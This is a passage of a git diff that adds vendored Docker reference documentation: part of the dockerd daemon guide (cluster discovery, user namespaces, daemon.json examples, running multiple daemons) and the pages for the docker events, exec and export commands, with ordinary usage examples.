+`docker run`, from the Docker daemon. Any `--ulimit` options passed to
+`docker run` will overwrite these defaults.
+
+Be careful setting `nproc` with the `ulimit` flag as `nproc` is designed by Linux to
+set the maximum number of processes available to a user, not to a container. For details
+please check the [run](run.md) reference.
+
+## Nodes discovery
+
+The `--cluster-advertise` option specifies the `host:port` or `interface:port`
+combination that this particular daemon instance should use when advertising
+itself to the cluster. The daemon is reached by remote hosts through this value.
+If you specify an interface, make sure it includes the IP address of the actual
+Docker host. For Engine installation created through `docker-machine`, the
+interface is typically `eth1`.
+
+The daemon uses [libkv](https://github.com/docker/libkv/) to advertise
+the node within the cluster. Some key-value backends support mutual
+TLS. The client TLS settings used by the daemon can be configured
+using the `--cluster-store-opt` flag, specifying the paths to PEM encoded
+files. 
For example: + +```bash +$ sudo dockerd \ + --cluster-advertise 192.168.1.2:2376 \ + --cluster-store etcd://192.168.1.2:2379 \ + --cluster-store-opt kv.cacertfile=/path/to/ca.pem \ + --cluster-store-opt kv.certfile=/path/to/cert.pem \ + --cluster-store-opt kv.keyfile=/path/to/key.pem +``` + +The currently supported cluster store options are: + +* `discovery.heartbeat` + + Specifies the heartbeat timer in seconds which is used by the daemon as a + keepalive mechanism to make sure discovery module treats the node as alive + in the cluster. If not configured, the default value is 20 seconds. + +* `discovery.ttl` + + Specifies the ttl (time-to-live) in seconds which is used by the discovery + module to timeout a node if a valid heartbeat is not received within the + configured ttl value. If not configured, the default value is 60 seconds. + +* `kv.cacertfile` + + Specifies the path to a local file with PEM encoded CA certificates to trust + +* `kv.certfile` + + Specifies the path to a local file with a PEM encoded certificate. This + certificate is used as the client cert for communication with the + Key/Value store. + +* `kv.keyfile` + + Specifies the path to a local file with a PEM encoded private key. This + private key is used as the client key for communication with the + Key/Value store. + +* `kv.path` + + Specifies the path in the Key/Value store. If not configured, the default value is 'docker/nodes'. + +## Access authorization + +Docker's access authorization can be extended by authorization plugins that your +organization can purchase or build themselves. You can install one or more +authorization plugins when you start the Docker `daemon` using the +`--authorization-plugin=PLUGIN_ID` option. + +```bash +$ sudo dockerd --authorization-plugin=plugin1 --authorization-plugin=plugin2,... +``` + +The `PLUGIN_ID` value is either the plugin's name or a path to its specification +file. The plugin's implementation determines whether you can specify a name or +path. 
Consult with your Docker administrator to get information about the +plugins available to you. + +Once a plugin is installed, requests made to the `daemon` through the command +line or Docker's Engine API are allowed or denied by the plugin. If you have +multiple plugins installed, at least one must allow the request for it to +complete. + +For information about how to create an authorization plugin, see [authorization +plugin](../../extend/plugins_authorization.md) section in the Docker extend section of this documentation. + + +## Daemon user namespace options + +The Linux kernel [user namespace support](http://man7.org/linux/man-pages/man7/user_namespaces.7.html) provides additional security by enabling +a process, and therefore a container, to have a unique range of user and +group IDs which are outside the traditional user and group range utilized by +the host system. Potentially the most important security improvement is that, +by default, container processes running as the `root` user will have expected +administrative privilege (with some restrictions) inside the container but will +effectively be mapped to an unprivileged `uid` on the host. + +When user namespace support is enabled, Docker creates a single daemon-wide mapping +for all containers running on the same engine instance. The mappings will +utilize the existing subordinate user and group ID feature available on all modern +Linux distributions. +The [`/etc/subuid`](http://man7.org/linux/man-pages/man5/subuid.5.html) and +[`/etc/subgid`](http://man7.org/linux/man-pages/man5/subgid.5.html) files will be +read for the user, and optional group, specified to the `--userns-remap` +parameter. If you do not wish to specify your own user and/or group, you can +provide `default` as the value to this flag, and a user will be created on your behalf +and provided subordinate uid and gid ranges. 
This default user will be named +`dockremap`, and entries will be created for it in `/etc/passwd` and +`/etc/group` using your distro's standard user and group creation tools. + +> **Note**: The single mapping per-daemon restriction is in place for now +> because Docker shares image layers from its local cache across all +> containers running on the engine instance. Since file ownership must be +> the same for all containers sharing the same layer content, the decision +> was made to map the file ownership on `docker pull` to the daemon's user and +> group mappings so that there is no delay for running containers once the +> content is downloaded. This design preserves the same performance for `docker +> pull`, `docker push`, and container startup as users expect with +> user namespaces disabled. + +### Starting the daemon with user namespaces enabled + +To enable user namespace support, start the daemon with the +`--userns-remap` flag, which accepts values in the following formats: + + - uid + - uid:gid + - username + - username:groupname + +If numeric IDs are provided, translation back to valid user or group names +will occur so that the subordinate uid and gid information can be read, given +these resources are name-based, not id-based. If the numeric ID information +provided does not exist as entries in `/etc/passwd` or `/etc/group`, daemon +startup will fail with an error message. + +**Example: starting with default Docker user management:** + +```bash +$ sudo dockerd --userns-remap=default +``` + +When `default` is provided, Docker will create - or find the existing - user and group +named `dockremap`. If the user is created, and the Linux distribution has +appropriate support, the `/etc/subuid` and `/etc/subgid` files will be populated +with a contiguous 65536 length range of subordinate user and group IDs, starting +at an offset based on prior entries in those files. 
For example, Ubuntu will +create the following range, based on an existing user named `user1` already owning +the first 65536 range: + +```bash +$ cat /etc/subuid +user1:100000:65536 +dockremap:165536:65536 +``` + +If you have a preferred/self-managed user with subordinate ID mappings already +configured, you can provide that username or uid to the `--userns-remap` flag. +If you have a group that doesn't match the username, you may provide the `gid` +or group name as well; otherwise the username will be used as the group name +when querying the system for the subordinate group ID range. + +The output of `docker info` can be used to determine if the daemon is running +with user namespaces enabled or not. If the daemon is configured with user +namespaces, the Security Options entry in the response will list "userns" as +one of the enabled security features. + +### Detailed information on `subuid`/`subgid` ranges + +Given potential advanced use of the subordinate ID ranges by power users, the +following paragraphs define how the Docker daemon currently uses the range entries +found within the subordinate range files. + +The simplest case is that only one contiguous range is defined for the +provided user or group. In this case, Docker will use that entire contiguous +range for the mapping of host uids and gids to the container process. This +means that the first ID in the range will be the remapped root user, and the +IDs above that initial ID will map host ID 1 through the end of the range. + +From the example `/etc/subuid` content shown above, the remapped root +user would be uid 165536. + +If the system administrator has set up multiple ranges for a single user or +group, the Docker daemon will read all the available ranges and use the +following algorithm to create the mapping ranges: + +1. The range segments found for the particular user will be sorted by *start ID* ascending. +2. 
Map segments will be created from each range in increasing value with a length matching the length of each segment. Therefore the range segment with the lowest numeric starting value will be equal to the remapped root, and continue up through host uid/gid equal to the range segment length. As an example, if the lowest segment starts at ID 1000 and has a length of 100, then a map of 1000 -> 0 (the remapped root) up through 1100 -> 100 will be created from this segment. If the next segment starts at ID 10000, then the next map will start with mapping 10000 -> 101 up to the length of this second segment. This will continue until no more segments are found in the subordinate files for this user.
+3. If more than five range segments exist for a single user, only the first five will be utilized, matching the kernel's limitation of only five entries in `/proc/self/uid_map` and `/proc/self/gid_map`.
+
+### Disable user namespace for a container
+
+If you enable user namespaces on the daemon, all containers are started
+with user namespaces enabled. In some situations you might want to disable
+this feature for a container, for example, to start a privileged container (see
+[user namespace known restrictions](#user-namespace-known-restrictions)).
+To enable those advanced features for a specific container use `--userns=host`
+in the `run/exec/create` command.
+This option will completely disable user namespace mapping for the container's user.
+
+### User namespace known restrictions
+
+The following standard Docker features are currently incompatible when
+running a Docker daemon with user namespaces enabled:
+
+ - sharing PID or NET namespaces with the host (`--pid=host` or `--net=host`)
+ - Using `--privileged` mode flag on `docker run` (unless also specifying `--userns=host`)
+
+In general, user namespaces are an advanced feature and will require
+coordination with other capabilities.
For example, if volumes are mounted from +the host, file ownership will have to be pre-arranged if the user or +administrator wishes the containers to have expected access to the volume +contents. Note that when using external volume or graph driver plugins, those +external software programs must be made aware of user and group mapping ranges +if they are to work seamlessly with user namespace support. + +Finally, while the `root` user inside a user namespaced container process has +many of the expected admin privileges that go along with being the superuser, the +Linux kernel has restrictions based on internal knowledge that this is a user namespaced +process. The most notable restriction that we are aware of at this time is the +inability to use `mknod`. Permission will be denied for device creation even as +container `root` inside a user namespace. + +## Miscellaneous options + +IP masquerading uses address translation to allow containers without a public +IP to talk to other machines on the Internet. This may interfere with some +network topologies and can be disabled with `--ip-masq=false`. + +Docker supports softlinks for the Docker data directory (`/var/lib/docker`) and +for `/var/lib/docker/tmp`. The `DOCKER_TMPDIR` and the data directory can be +set like this: + + DOCKER_TMPDIR=/mnt/disk2/tmp /usr/local/bin/dockerd -D -g /var/lib/docker -H unix:// > /var/lib/docker-machine/docker.log 2>&1 + # or + export DOCKER_TMPDIR=/mnt/disk2/tmp + /usr/local/bin/dockerd -D -g /var/lib/docker -H unix:// > /var/lib/docker-machine/docker.log 2>&1 + +## Default cgroup parent + +The `--cgroup-parent` option allows you to set the default cgroup parent +to use for containers. If this option is not set, it defaults to `/docker` for +fs cgroup driver and `system.slice` for systemd cgroup driver. + +If the cgroup has a leading forward slash (`/`), the cgroup is created +under the root cgroup, otherwise the cgroup is created under the daemon +cgroup. 
+ +Assuming the daemon is running in cgroup `daemoncgroup`, +`--cgroup-parent=/foobar` creates a cgroup in +`/sys/fs/cgroup/memory/foobar`, whereas using `--cgroup-parent=foobar` +creates the cgroup in `/sys/fs/cgroup/memory/daemoncgroup/foobar` + +The systemd cgroup driver has different rules for `--cgroup-parent`. Systemd +represents hierarchy by slice and the name of the slice encodes the location in +the tree. So `--cgroup-parent` for systemd cgroups should be a slice name. A +name can consist of a dash-separated series of names, which describes the path +to the slice from the root slice. For example, `--cgroup-parent=user-a-b.slice` +means the memory cgroup for the container is created in +`/sys/fs/cgroup/memory/user.slice/user-a.slice/user-a-b.slice/docker-.scope`. + +This setting can also be set per container, using the `--cgroup-parent` +option on `docker create` and `docker run`, and takes precedence over +the `--cgroup-parent` option on the daemon. + +## Daemon Metrics + +The `--metrics-addr` option takes a tcp address to serve the metrics API. +This feature is still experimental, therefore, the daemon must be running in experimental +mode for this feature to work. + +To serve the metrics API on localhost:1337 you would specify `--metrics-addr 127.0.0.1:1337` +allowing you to make requests on the API at `127.0.0.1:1337/metrics` to receive metrics in the +[prometheus](https://prometheus.io/docs/instrumenting/exposition_formats/) format. + +If you are running a prometheus server you can add this address to your scrape configs +to have prometheus collect metrics on Docker. For more information +on prometheus you can view the website [here](https://prometheus.io/). + +```yml +scrape_configs: + - job_name: 'docker' + static_configs: + - targets: ['127.0.0.1:1337'] +``` + +Please note that this feature is still marked as experimental as metrics and metric +names could change while this feature is still in experimental. 
Please provide
+feedback on what you would like to see collected in the API.
+
+## Daemon configuration file
+
+The `--config-file` option allows you to set any configuration option
+for the daemon in a JSON format. This file uses the same flag names as keys,
+except for flags that allow several entries, where it uses the plural
+of the flag name, e.g., `labels` for the `label` flag.
+
+The options set in the configuration file must not conflict with options set
+via flags. The docker daemon fails to start if an option is duplicated between
+the file and the flags, regardless of their value. We do this to avoid
+silently ignoring changes introduced in configuration reloads.
+For example, the daemon fails to start if you set daemon labels
+in the configuration file and also set daemon labels via the `--label` flag.
+Options that are not present in the file are ignored when the daemon starts.
+
+### Linux configuration file
+
+The default location of the configuration file on Linux is
+`/etc/docker/daemon.json`. The `--config-file` flag can be used to specify a
+non-default location.
+ +This is a full example of the allowed configuration options on Linux: + +```json +{ + "authorization-plugins": [], + "dns": [], + "dns-opts": [], + "dns-search": [], + "exec-opts": [], + "exec-root": "", + "experimental": false, + "storage-driver": "", + "storage-opts": [], + "labels": [], + "live-restore": true, + "log-driver": "", + "log-opts": {}, + "mtu": 0, + "pidfile": "", + "graph": "", + "cluster-store": "", + "cluster-store-opts": {}, + "cluster-advertise": "", + "max-concurrent-downloads": 3, + "max-concurrent-uploads": 5, + "shutdown-timeout": 15, + "debug": true, + "hosts": [], + "log-level": "", + "tls": true, + "tlsverify": true, + "tlscacert": "", + "tlscert": "", + "tlskey": "", + "swarm-default-advertise-addr": "", + "api-cors-header": "", + "selinux-enabled": false, + "userns-remap": "", + "group": "", + "cgroup-parent": "", + "default-ulimits": {}, + "init": false, + "init-path": "/usr/libexec/docker-init", + "ipv6": false, + "iptables": false, + "ip-forward": false, + "ip-masq": false, + "userland-proxy": false, + "userland-proxy-path": "/usr/libexec/docker-proxy", + "ip": "0.0.0.0", + "bridge": "", + "bip": "", + "fixed-cidr": "", + "fixed-cidr-v6": "", + "default-gateway": "", + "default-gateway-v6": "", + "icc": false, + "raw-logs": false, + "registry-mirrors": [], + "seccomp-profile": "", + "insecure-registries": [], + "disable-legacy-registry": false, + "default-runtime": "runc", + "oom-score-adjust": -500, + "runtimes": { + "runc": { + "path": "runc" + }, + "custom": { + "path": "/usr/local/bin/my-runc-replacement", + "runtimeArgs": [ + "--debug" + ] + } + } +} +``` + +### Windows configuration file + +The default location of the configuration file on Windows is + `%programdata%\docker\config\daemon.json`. The `--config-file` flag can be + used to specify a non-default location. 
+ +This is a full example of the allowed configuration options on Windows: + +```json +{ + "authorization-plugins": [], + "dns": [], + "dns-opts": [], + "dns-search": [], + "exec-opts": [], + "experimental": false, + "storage-driver": "", + "storage-opts": [], + "labels": [], + "log-driver": "", + "mtu": 0, + "pidfile": "", + "graph": "", + "cluster-store": "", + "cluster-advertise": "", + "max-concurrent-downloads": 3, + "max-concurrent-uploads": 5, + "shutdown-timeout": 15, + "debug": true, + "hosts": [], + "log-level": "", + "tlsverify": true, + "tlscacert": "", + "tlscert": "", + "tlskey": "", + "swarm-default-advertise-addr": "", + "group": "", + "default-ulimits": {}, + "bridge": "", + "fixed-cidr": "", + "raw-logs": false, + "registry-mirrors": [], + "insecure-registries": [], + "disable-legacy-registry": false +} +``` + +### Configuration reloading + +Some options can be reconfigured when the daemon is running without requiring +to restart the process. We use the `SIGHUP` signal in Linux to reload, and a global event +in Windows with the key `Global\docker-daemon-config-$PID`. The options can +be modified in the configuration file but still will check for conflicts with +the provided flags. The daemon fails to reconfigure itself +if there are conflicts, but it won't stop execution. + +The list of currently supported options that can be reconfigured is this: + +- `debug`: it changes the daemon to debug mode when set to true. +- `cluster-store`: it reloads the discovery store with the new address. +- `cluster-store-opts`: it uses the new options to reload the discovery store. +- `cluster-advertise`: it modifies the address advertised after reloading. +- `labels`: it replaces the daemon labels with a new set of labels. +- `live-restore`: Enables [keeping containers alive during daemon downtime](https://docs.docker.com/engine/admin/live-restore/). +- `max-concurrent-downloads`: it updates the max concurrent downloads for each pull. 
+
- `max-concurrent-uploads`: it updates the max concurrent uploads for each push.
+- `default-runtime`: it updates the runtime to be used if it is not
+  specified at container creation. It defaults to "default" which is
+  the runtime shipped with the official docker packages.
+- `runtimes`: it updates the list of available OCI runtimes that can
+  be used to run containers.
+- `authorization-plugin`: specifies the authorization plugins to use.
+- `insecure-registries`: it replaces the daemon insecure registries with a new set of insecure registries. If some existing insecure registries in daemon's configuration are not in the newly reloaded insecure registries, these existing ones will be removed from daemon's config.
+
+Updating and reloading the cluster configurations such as `--cluster-store`,
+`--cluster-advertise` and `--cluster-store-opts` will take effect only if
+these configurations were not previously configured. If `--cluster-store`
+has been provided in flags and `cluster-advertise` not, `cluster-advertise`
+can be added in the configuration file without being accompanied by `--cluster-store`.
+Configuration reload will log a warning message if it detects a change in
+previously configured cluster configurations.
+
+
+## Running multiple daemons
+
+> **Note:** Running multiple daemons on a single host is considered "experimental". The user should be aware of
+> unsolved problems. This solution may not work properly in some cases. Solutions are currently under development
+> and will be delivered in the near future.
+
+This section describes how to run multiple Docker daemons on a single host. To
+run multiple daemons, you must configure each daemon so that it does not
+conflict with other daemons on the same host. You can set these options either
+by providing them as flags, or by using a [daemon configuration file](#daemon-configuration-file).
+ +The following daemon options must be configured for each daemon: + +```bash +-b, --bridge= Attach containers to a network bridge +--exec-root=/var/run/docker Root of the Docker execdriver +-g, --graph=/var/lib/docker Root of the Docker runtime +-p, --pidfile=/var/run/docker.pid Path to use for daemon PID file +-H, --host=[] Daemon socket(s) to connect to +--iptables=true Enable addition of iptables rules +--config-file=/etc/docker/daemon.json Daemon configuration file +--tlscacert="~/.docker/ca.pem" Trust certs signed only by this CA +--tlscert="~/.docker/cert.pem" Path to TLS certificate file +--tlskey="~/.docker/key.pem" Path to TLS key file +``` + +When your daemons use different values for these flags, you can run them on the same host without any problems. +It is very important to properly understand the meaning of those options and to use them correctly. + +- The `-b, --bridge=` flag is set to `docker0` as default bridge network. It is created automatically when you install Docker. +If you are not using the default, you must create and configure the bridge manually or just set it to 'none': `--bridge=none` +- `--exec-root` is the path where the container state is stored. The default value is `/var/run/docker`. Specify the path for +your running daemon here. +- `--graph` is the path where images are stored. The default value is `/var/lib/docker`. To avoid any conflict with other daemons +set this parameter separately for each daemon. +- `-p, --pidfile=/var/run/docker.pid` is the path where the process ID of the daemon is stored. Specify the path for your +pid file here. +- `--host=[]` specifies where the Docker daemon will listen for client connections. If unspecified, it defaults to `/var/run/docker.sock`. +- `--iptables=false` prevents the Docker daemon from adding iptables rules. If +multiple daemons manage iptables rules, they may overwrite rules set by another +daemon. 
Be aware that disabling this option requires you to manually add +iptables rules to expose container ports. If you prevent Docker from adding +iptables rules, Docker will also not add IP masquerading rules, even if you set +`--ip-masq` to `true`. Without IP masquerading rules, Docker containers will not be +able to connect to external hosts or the internet when using network other than +default bridge. +- `--config-file=/etc/docker/daemon.json` is the path where configuration file is stored. You can use it instead of +daemon flags. Specify the path for each daemon. +- `--tls*` Docker daemon supports `--tlsverify` mode that enforces encrypted and authenticated remote connections. +The `--tls*` options enable use of specific certificates for individual daemons. + +Example script for a separate “bootstrap” instance of the Docker daemon without network: + +```bash +$ sudo dockerd \ + -H unix:///var/run/docker-bootstrap.sock \ + -p /var/run/docker-bootstrap.pid \ + --iptables=false \ + --ip-masq=false \ + --bridge=none \ + --graph=/var/lib/docker-bootstrap \ + --exec-root=/var/run/docker-bootstrap +``` diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/events.md b/vendor/github.com/docker/docker/docs/reference/commandline/events.md new file mode 100644 index 0000000000..baa966d620 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/events.md @@ -0,0 +1,217 @@ +--- +title: "events" +description: "The events command description and usage" +keywords: "events, container, report" +--- + + + +# events + +```markdown +Usage: docker events [OPTIONS] + +Get real time events from the server + +Options: + -f, --filter value Filter output based on conditions provided (default []) + --format string Format the output using the given Go template + --help Print usage + --since string Show all events created since timestamp + --until string Stream events until this timestamp +``` + +Docker containers report the following events: + + 
attach, commit, copy, create, destroy, detach, die, exec_create, exec_detach, exec_start, export, health_status, kill, oom, pause, rename, resize, restart, start, stop, top, unpause, update + +Docker images report the following events: + + delete, import, load, pull, push, save, tag, untag + +Docker plugins report the following events: + + install, enable, disable, remove + +Docker volumes report the following events: + + create, mount, unmount, destroy + +Docker networks report the following events: + + create, connect, disconnect, destroy + +Docker daemon report the following events: + + reload + +The `--since` and `--until` parameters can be Unix timestamps, date formatted +timestamps, or Go duration strings (e.g. `10m`, `1h30m`) computed +relative to the client machine’s time. If you do not provide the `--since` option, +the command returns only new and/or live events. Supported formats for date +formatted time stamps include RFC3339Nano, RFC3339, `2006-01-02T15:04:05`, +`2006-01-02T15:04:05.999999999`, `2006-01-02Z07:00`, and `2006-01-02`. The local +timezone on the client will be used if you do not provide either a `Z` or a +`+-00:00` timezone offset at the end of the timestamp. When providing Unix +timestamps enter seconds[.nanoseconds], where seconds is the number of seconds +that have elapsed since January 1, 1970 (midnight UTC/GMT), not counting leap +seconds (aka Unix epoch or Unix time), and the optional .nanoseconds field is a +fraction of a second no more than nine digits long. + +## Filtering + +The filtering flag (`-f` or `--filter`) format is of "key=value". 
If you would +like to use multiple filters, pass multiple flags (e.g., +`--filter "foo=bar" --filter "bif=baz"`) + +Using the same filter multiple times will be handled as a *OR*; for example +`--filter container=588a23dac085 --filter container=a8f7720b8c22` will display +events for container 588a23dac085 *OR* container a8f7720b8c22 + +Using multiple filters will be handled as a *AND*; for example +`--filter container=588a23dac085 --filter event=start` will display events for +container container 588a23dac085 *AND* the event type is *start* + +The currently supported filters are: + +* container (`container=`) +* event (`event=`) +* image (`image=`) +* plugin (experimental) (`plugin=`) +* label (`label=` or `label==`) +* type (`type=`) +* volume (`volume=`) +* network (`network=`) +* daemon (`daemon=`) + +## Format + +If a format (`--format`) is specified, the given template will be executed +instead of the default +format. Go's [text/template](http://golang.org/pkg/text/template/) package +describes all the details of the format. + +If a format is set to `{{json .}}`, the events are streamed as valid JSON +Lines. For information about JSON Lines, please refer to http://jsonlines.org/ . + +## Examples + +You'll need two shells for this example. + +**Shell 1: Listening for events:** + + $ docker events + +**Shell 2: Start and Stop containers:** + + $ docker start 4386fb97867d + $ docker stop 4386fb97867d + $ docker stop 7805c1d35632 + +**Shell 1: (Again .. 
now showing events):** + + 2015-05-12T11:51:30.999999999Z07:00 container start 4386fb97867d (image=ubuntu-1:14.04) + 2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) + 2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) + 2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) + 2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) + +**Show events in the past from a specified time:** + + $ docker events --since 1378216169 + 2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) + 2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) + 2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) + 2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) + + $ docker events --since '2013-09-03' + 2015-05-12T11:51:30.999999999Z07:00 container start 4386fb97867d (image=ubuntu-1:14.04) + 2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) + 2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) + 2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) + 2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) + + $ docker events --since '2013-09-03T15:49:29' + 2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) + 2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) + 2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) + 2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) + +This example outputs all events that were generated in the last 3 minutes, +relative to the current time on the client machine: + + $ docker events --since '3m' + 2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d 
(image=ubuntu-1:14.04) + 2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) + 2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) + 2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) + +**Filter events:** + + $ docker events --filter 'event=stop' + 2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) + 2014-09-03T17:42:14.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) + + $ docker events --filter 'image=ubuntu-1:14.04' + 2014-05-10T17:42:14.999999999Z07:00 container start 4386fb97867d (image=ubuntu-1:14.04) + 2014-05-10T17:42:14.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) + 2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) + + $ docker events --filter 'container=7805c1d35632' + 2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) + 2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image= redis:2.8) + + $ docker events --filter 'container=7805c1d35632' --filter 'container=4386fb97867d' + 2014-09-03T15:49:29.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) + 2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) + 2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) + 2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) + + $ docker events --filter 'container=7805c1d35632' --filter 'event=stop' + 2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) + + $ docker events --filter 'container=container_1' --filter 'container=container_2' + 2014-09-03T15:49:29.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) + 2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) + 2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (imager=redis:2.8) + 
2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) + + $ docker events --filter 'type=volume' + 2015-12-23T21:05:28.136212689Z volume create test-event-volume-local (driver=local) + 2015-12-23T21:05:28.383462717Z volume mount test-event-volume-local (read/write=true, container=562fe10671e9273da25eed36cdce26159085ac7ee6707105fd534866340a5025, destination=/foo, driver=local, propagation=rprivate) + 2015-12-23T21:05:28.650314265Z volume unmount test-event-volume-local (container=562fe10671e9273da25eed36cdce26159085ac7ee6707105fd534866340a5025, driver=local) + 2015-12-23T21:05:28.716218405Z volume destroy test-event-volume-local (driver=local) + + $ docker events --filter 'type=network' + 2015-12-23T21:38:24.705709133Z network create 8b111217944ba0ba844a65b13efcd57dc494932ee2527577758f939315ba2c5b (name=test-event-network-local, type=bridge) + 2015-12-23T21:38:25.119625123Z network connect 8b111217944ba0ba844a65b13efcd57dc494932ee2527577758f939315ba2c5b (name=test-event-network-local, container=b4be644031a3d90b400f88ab3d4bdf4dc23adb250e696b6328b85441abe2c54e, type=bridge) + + $ docker events --filter 'type=plugin' (experimental) + 2016-07-25T17:30:14.825557616Z plugin pull ec7b87f2ce84330fe076e666f17dfc049d2d7ae0b8190763de94e1f2d105993f (name=tiborvass/sample-volume-plugin:latest) + 2016-07-25T17:30:14.888127370Z plugin enable ec7b87f2ce84330fe076e666f17dfc049d2d7ae0b8190763de94e1f2d105993f (name=tiborvass/sample-volume-plugin:latest) + +**Format:** + + $ docker events --filter 'type=container' --format 'Type={{.Type}} Status={{.Status}} ID={{.ID}}' + Type=container Status=create ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 + Type=container Status=attach ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 + Type=container Status=start ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 + Type=container Status=resize ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 + 
Type=container Status=die ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 + Type=container Status=destroy ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 + +**Format (as JSON Lines):** + + $ docker events --format '{{json .}}' + {"status":"create","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4.. + {"status":"attach","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4.. + {"Type":"network","Action":"connect","Actor":{"ID":"1b50a5bf755f6021dfa78e.. + {"status":"start","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f42.. + {"status":"resize","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4.. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/exec.md b/vendor/github.com/docker/docker/docs/reference/commandline/exec.md new file mode 100644 index 0000000000..38891c9ea0 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/exec.md @@ -0,0 +1,65 @@ +--- +title: "exec" +description: "The exec command description and usage" +keywords: "command, container, run, execute" +--- + + + +# exec + +```markdown +Usage: docker exec [OPTIONS] CONTAINER COMMAND [ARG...] + +Run a command in a running container + +Options: + -d, --detach Detached mode: run command in the background + --detach-keys Override the key sequence for detaching a container + -e, --env=[] Set environment variables + --help Print usage + -i, --interactive Keep STDIN open even if not attached + --privileged Give extended privileges to the command + -t, --tty Allocate a pseudo-TTY + -u, --user Username or UID (format: [:]) +``` + +The `docker exec` command runs a new command in a running container. + +The command started using `docker exec` only runs while the container's primary +process (`PID 1`) is running, and it is not restarted if the container is +restarted. 
+ +If the container is paused, then the `docker exec` command will fail with an error: + + $ docker pause test + test + $ docker ps + CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES + 1ae3b36715d2 ubuntu:latest "bash" 17 seconds ago Up 16 seconds (Paused) test + $ docker exec test ls + FATA[0000] Error response from daemon: Container test is paused, unpause the container before exec + $ echo $? + 1 + +## Examples + + $ docker run --name ubuntu_bash --rm -i -t ubuntu bash + +This will create a container named `ubuntu_bash` and start a Bash session. + + $ docker exec -d ubuntu_bash touch /tmp/execWorks + +This will create a new file `/tmp/execWorks` inside the running container +`ubuntu_bash`, in the background. + + $ docker exec -it ubuntu_bash bash + +This will create a new Bash session in the container `ubuntu_bash`. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/export.md b/vendor/github.com/docker/docker/docs/reference/commandline/export.md new file mode 100644 index 0000000000..1004fc30c0 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/export.md @@ -0,0 +1,43 @@ +--- +title: "export" +description: "The export command description and usage" +keywords: "export, file, system, container" +--- + + + +# export + +```markdown +Usage: docker export [OPTIONS] CONTAINER + +Export a container's filesystem as a tar archive + +Options: + --help Print usage + -o, --output string Write to a file, instead of STDOUT +``` + +The `docker export` command does not export the contents of volumes associated +with the container. If a volume is mounted on top of an existing directory in +the container, `docker export` will export the contents of the *underlying* +directory, not the contents of the volume. + +Refer to [Backup, restore, or migrate data +volumes](https://docs.docker.com/engine/tutorials/dockervolumes/#backup-restore-or-migrate-data-volumes) in +the user guide for examples on exporting data in a volume. 
